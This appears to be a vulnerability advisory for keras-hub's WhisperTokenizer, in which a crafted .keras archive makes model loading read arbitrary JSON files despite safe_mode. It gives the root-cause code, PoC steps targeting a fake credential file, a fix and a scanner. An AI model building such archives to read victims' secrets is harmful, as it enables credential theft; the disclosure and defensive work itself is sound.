WhisperTokenizer Arbitrary JSON File Read via Crafted .keras Archive
Vulnerability: keras_hub.models.WhisperTokenizer reads an attacker-controlled
JSON file path from config.json during model deserialization with no safe mode guard.
Impact: Loading a crafted .keras file reads any JSON-formatted file accessible
to the process and exposes its content in model.language_tokens. safe_mode=True
does not protect this path.
CVE status: No CVE assigned. Distinct from CVE-2025-12058 and PR #2517.
PR #2517 patched BytePairTokenizer but WhisperTokenizer's _load_dict() helper
bypasses that guard.
Root cause
keras_hub/src/models/whisper/whisper_tokenizer.py:
def _load_dict(dict_or_path):
    if isinstance(dict_or_path, str):
        with open(dict_or_path, "r", encoding="utf-8") as f:  # no in_safe_mode() check
            dict_or_path = json.load(f)
    return dict_or_path
Called from __init__():
if language_tokens is not None:
    language_tokens = _load_dict(language_tokens)  # fires if string path
Compare with the correctly patched BytePairTokenizer (PR #2517):
if isinstance(vocabulary, str):
    if serialization_lib.in_safe_mode():
        raise ValueError("Requested loading a vocabulary file outside model archive...")
    with open(vocabulary, "r", encoding="utf-8") as f:
        ...
Additional bypass: vocabulary parameter
WhisperTokenizer.set_vocabulary_and_merges() also calls _load_dict(vocabulary)
BEFORE passing the result to the parent class. This converts a path string into a
dict, bypassing BytePairTokenizer's in_safe_mode() check entirely (which only
triggers when it receives a string, not a dict).
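The ordering problem can be shown without keras-hub at all. The following is a minimal sketch using hypothetical stand-in classes (`ParentTokenizer`, `ChildTokenizer`) and a stand-in `in_safe_mode()` flag; none of these are the real keras-hub implementations. It only illustrates why a guard that fires on string input is skipped once the path has already been resolved to a dict.

```python
import json
import os
import tempfile

# Stand-in for serialization_lib.in_safe_mode(); here it is a plain module flag.
SAFE_MODE = True


def in_safe_mode():
    return SAFE_MODE


def load_dict(dict_or_path):
    """Mirrors the unguarded helper: a string is treated as a path and opened."""
    if isinstance(dict_or_path, str):
        with open(dict_or_path, "r", encoding="utf-8") as f:
            dict_or_path = json.load(f)
    return dict_or_path


class ParentTokenizer:
    """Hypothetical parent whose guard only fires for string input."""

    def set_vocabulary(self, vocabulary):
        if isinstance(vocabulary, str):
            if in_safe_mode():
                raise ValueError("Refusing to load a vocabulary file in safe mode.")
            with open(vocabulary, "r", encoding="utf-8") as f:
                vocabulary = json.load(f)
        self.vocabulary = vocabulary


class ChildTokenizer(ParentTokenizer):
    """Hypothetical child that resolves the path before delegating."""

    def set_vocabulary(self, vocabulary):
        vocabulary = load_dict(vocabulary)  # path -> dict, no safe-mode check
        super().set_vocabulary(vocabulary)  # parent sees a dict, guard is skipped


def demo():
    """Return (parent_blocked, child_vocabulary) for the same path input."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "vocab.json")
        with open(path, "w", encoding="utf-8") as f:
            json.dump({"a": 0}, f)
        parent_blocked = False
        try:
            ParentTokenizer().set_vocabulary(path)
        except ValueError:
            parent_blocked = True
        child = ChildTokenizer()
        child.set_vocabulary(path)
        return parent_blocked, child.vocabulary
```

Calling `demo()` shows the parent rejecting the path while the child loads the same file, which is why the check has to live in the helper that opens the file rather than only in the parent class.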
Affected versions
keras-hub 0.25.1 (PyPI) and later (WhisperTokenizer has been present since the initial keras-hub releases). Live-confirmed on 0.25.1.
Reproduction
Requirements:
pip install keras==3.12.1 keras-hub tensorflow
Step 1: Create the target file (simulates a GCP service account key, Docker config, or other JSON credentials):
echo '{"type":"service_account","project_id":"victim-proj","private_key_id":"abc123"}' > /tmp/whisper_poc_target.json
Step 2: Run the PoC:
import sys
from unittest.mock import MagicMock
sys.modules.setdefault("tensorflow_text", MagicMock())
import keras
import keras_hub # required: registers keras_hub>WhisperTokenizer
model = keras.models.load_model("malicious_whisper.keras", safe_mode=True)
print("model.language_tokens:", repr(model.language_tokens))
# Prints the parsed JSON content of /tmp/whisper_poc_target.json
Full self-contained PoC
See poc_whisper_file_read.py in this repo.
Suggested fix
Add in_safe_mode() checks in _load_dict() and set_vocabulary_and_merges():
import json

from keras.src.saving import serialization_lib

def _load_dict(dict_or_path):
    if isinstance(dict_or_path, str):
        # Refuse to open arbitrary paths while deserializing in safe mode.
        if serialization_lib.in_safe_mode():
            raise ValueError(
                "Requested loading a file outside the model archive. "
                "Pass safe_mode=False if you trust the source."
            )
        with open(dict_or_path, "r", encoding="utf-8") as f:
            dict_or_path = json.load(f)
    return dict_or_path
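Independently of the library fix, an untrusted archive can be inspected before it is loaded. The sketch below assumes the .keras file is a zip archive with a top-level config.json and flags any string value stored under keys the tokenizer may treat as a file path. The key set is an assumption: `language_tokens` and `vocabulary` come from the analysis above, while `merges` and `special_tokens` are added as a guess and should be adjusted. The function names are hypothetical and not part of Keras or keras-hub.

```python
import json
import zipfile

# Assumed set of config keys that a tokenizer may interpret as file paths.
SUSPECT_KEYS = {"vocabulary", "merges", "language_tokens", "special_tokens"}


def find_path_like_values(node, trail=""):
    """Recursively collect (location, value) pairs where a suspect key holds a string."""
    hits = []
    if isinstance(node, dict):
        for key, value in node.items():
            here = f"{trail}/{key}"
            if key in SUSPECT_KEYS and isinstance(value, str):
                hits.append((here, value))
            hits.extend(find_path_like_values(value, here))
    elif isinstance(node, list):
        for i, item in enumerate(node):
            hits.extend(find_path_like_values(item, f"{trail}/{i}"))
    return hits


def scan_keras_archive(path):
    """Read config.json from the archive without deserializing any model objects."""
    with zipfile.ZipFile(path) as archive:
        with archive.open("config.json") as f:
            config = json.load(f)
    return find_path_like_values(config)
```

An empty result from `scan_keras_archive("model.keras")` does not prove the archive is safe; a non-empty result means a config field that should hold inline data holds a string instead, which is worth reviewing before calling `load_model`.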